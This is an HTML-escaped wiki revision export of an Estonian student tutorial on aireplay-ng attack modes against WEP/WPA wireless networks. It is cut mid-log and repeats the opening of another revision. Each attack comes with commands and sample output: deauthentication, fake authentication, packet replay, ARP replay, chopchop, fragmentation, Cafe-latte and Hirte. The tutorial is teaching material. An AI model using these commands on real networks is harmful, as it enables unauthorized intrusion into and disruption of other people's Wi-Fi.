21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:40:20  Sending Authentication Request&lt;br /&gt;
21:40:20  Authentication successful&lt;br /&gt;
21:40:20  Sending Association Request&lt;br /&gt;
21:40:20  Association successful :-)&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;...&lt;br /&gt;
15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0&lt;br /&gt;
 Read 4 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 68, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 de00 0014 6c7e 4080 000f b534 3030  .A....l~@....400&lt;br /&gt;
      0x0010:  ffff ffff ffff 4045 d16a c800 6f4f ddef  ......@E.j..oO..&lt;br /&gt;
      0x0020:  b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162  ...|.*d....c..Ab&lt;br /&gt;
      0x0030:  8ad9 2f74 16bb abcf 232e 97ee 5e45 754d  ../t....#...^EuM&lt;br /&gt;
      0x0040:  23e0 883e                                #..&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0&lt;br /&gt;
 Read 10 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 124, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  BB:BB:BB:BB:BB:BB&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 2c00 0014 6c7e 4080 000f b534 3030  .A,...l~@....400&lt;br /&gt;
      0x0010:  0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7  .@.w....=y...Y+.&lt;br /&gt;
      0x0020:  96e7 fadf e0de 2e99 c019 4f85 9508 3bcc  ..........O...;.&lt;br /&gt;
      0x0030:  8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7  ..........X...{.&lt;br /&gt;
      0x0040:  8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d  ..i...;.Cj..v,..&lt;br /&gt;
      0x0050:  7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913  zW?=.&amp;lt;.....emf..&lt;br /&gt;
      0x0060:  9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825  ....o..h+ U...%&lt;br /&gt;
      0x0070:  bf22 960a 5c7b 3036 290a 89d6            .&amp;quot;..\{06)...&lt;br /&gt;
 &lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA-d FF:FF:FF:FF:FF:FF -t 1 mon0&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
 Saving ARP requests in replay_arp-0001-123456.cap&lt;br /&gt;
 You should also start airodump-ng to capture replies.&lt;br /&gt;
 Read 11978 packets (got 7193 ARP requests), sent 3902 packets...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -4 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA mon0&lt;br /&gt;
       Read 165 packets...&lt;br /&gt;
&lt;br /&gt;
         Size: 86, FromDS: 1, ToDS: 0 (WEP)&lt;br /&gt;
 &lt;br /&gt;
         BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
         Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;
         Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
         0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.&lt;br /&gt;
         0x0010:  0040 f477 e5c9 603a d600 0000 5fed a222  .@.w..`:...._..&amp;quot;&lt;br /&gt;
         0x0020:  e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543  ...H......._=..C&lt;br /&gt;
         0x0030:  d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873  ....j.....%.[.(s&lt;br /&gt;
         0x0040:  16d4 43fb aebb 3ea1 7101 729e 65ca 6905  ..C...&amp;gt;.q.r.e.i.&lt;br /&gt;
         0x0050:  cfeb 4a72 be46                           ..Jr.F&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&lt;br /&gt;
 Saving chosen packet in replay_src-0001-123456.cap&lt;br /&gt;
 &lt;br /&gt;
 Offset   85 ( 0% done) | xor = D3 | pt = 95 |  253 frames written in   760ms&lt;br /&gt;
 Offset   84 ( 1% done) | xor = EB | pt = 55 |  166 frames written in   498ms&lt;br /&gt;
 Offset   83 ( 3% done) | xor = 47 | pt = 35 |  215 frames written in   645ms&lt;br /&gt;
 Offset   82 ( 5% done) | xor = 07 | pt = 4D |  161 frames written in   483ms&lt;br /&gt;
 Offset   81 ( 7% done) | xor = EB | pt = 00 |   12 frames written in    36ms&lt;br /&gt;
 ...&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0001-123457.cap&lt;br /&gt;
 Saving keystream in replay_dec-0001-123456.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugemiseks paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -5 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
Waiting for a data packet...&lt;br /&gt;
Read 96 packets...&lt;br /&gt;
&lt;br /&gt;
      Size: 120, FromDS: 1, ToDS: 0 (WEP)&lt;br /&gt;
&lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
      Source MAC  =  BB:BB:BB:BB:BB:BB&lt;br /&gt;
&lt;br /&gt;
      0x0000:  0842 0201 000f b5ab cb9d 0014 6c7e 4080  .B..........l~@.&lt;br /&gt;
      0x0010:  00d0 cf03 348c e0d2 4001 0000 2b62 7a01  ....4...@...+bz.&lt;br /&gt;
      0x0020:  6d6d b1e0 92a8 039b ca6f cecb 5364 6e16  mm.......o..Sdn.&lt;br /&gt;
      0x0030:  a21d 2a70 49cf eef8 f9b9 279c 9020 30c4  ..*pI.....&#039;.. 0.&lt;br /&gt;
      0x0040:  7013 f7f3 5953 1234 5727 146c eeaa a594  p...YS.4W&#039;.l....&lt;br /&gt;
      0x0050:  fd55 66a2 030f 472d 2682 3957 8429 9ca5  .Uf...G-&amp;amp;.9W.)..&lt;br /&gt;
      0x0060:  517f 1544 bd82 ad77 fe9a cd99 a43c 52a1  Q.D...w.....&amp;lt;R.&lt;br /&gt;
      0x0070:  0505 933f af2f 740e                      ...?./t.&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
Saving chosen packet in replay_src-0001-123456.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0001-123456.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -6 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA -D mon0&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -7  -h CC:CC:CC:CC:CC:CC -D mon0&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32801</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32801"/>
		<updated>2011-05-24T19:26:56Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Teooria */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
